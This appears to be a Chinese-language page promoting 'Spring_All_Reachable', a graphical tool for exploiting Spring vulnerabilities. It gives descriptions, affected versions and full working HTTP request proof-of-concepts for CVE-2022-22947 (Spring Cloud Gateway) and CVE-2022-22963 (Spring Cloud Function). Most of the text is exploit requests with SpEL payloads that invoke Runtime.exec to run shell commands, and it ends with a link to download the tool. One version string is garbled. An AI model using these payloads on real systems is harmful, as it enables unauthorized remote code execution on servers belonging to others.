工具介绍Spring_All_Reachable一款针对Spring漏洞框架进行快速利用的图形化工具。工具使用Spring Cloud Gateway命令执行CVE-2022-22947漏洞描述Spring Cloud Gateway存在远程代码执行漏洞该漏洞是发生在Spring Cloud Gateway应用程序的Actuator端点其在启用、公开和不安全的情 况下容易受到代码注入的攻击。攻击者可利用该漏洞通过恶意创建允许在远程主机上执行任意远程请求。漏洞影响​ VMWare Spring Cloud GateWay 3.1.0​ VMWare Spring Cloud GateWay 3.0.03.0.6​ VMWare Spring Cloud GateWay ❤️.0.0漏洞pocPOST /actuator/gateway/routes/hacktest HTTP/1.1 Host: localhost:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/json Content-Length: 328 { id: hacktest, filters: [{ name: AddResponseHeader, args: {name: Result,value: #{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\id\}).getInputStream()))}} }], uri: http://example.com, order: 0 }POST /actuator/gateway/refresh HTTP/1.1 Host: localhost:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0GET /actuator/gateway/routes/hacktest HTTP/1.1 Host: localhost:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0DELETE /actuator/gateway/routes/hacktest HTTP/1.1 Host: localhost:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: closePOST /actuator/gateway/refresh HTTP/1.1 Host: localhost:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0工具使用Spring Cloud Function SpEL 远程代码执行 (CVE-2022-22963)漏洞描述Spring Cloud Function 是Spring cloud中的serverless框架。Spring Cloud Function 中的 RoutingFunction 类的 apply 方法将请求头中的“spring.cloud.function.routing-expression”参数作为 Spel 表达式进行处理造成 Spel 表达式注入漏洞。攻击者可通过该漏洞执行任意代码。漏洞影响org.springframework.cloud:spring-cloud-function-context影响版本3.0.0.RELEASE~3.2.2漏洞pocPOST /functionRouter HTTP/1.1 Host: localhost:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec(touch /tmp/success) Content-Type: text/plain Content-Length: 4 test工具使用工具下载https://github.com/savior-only/Spring_All_Reachable/tree/main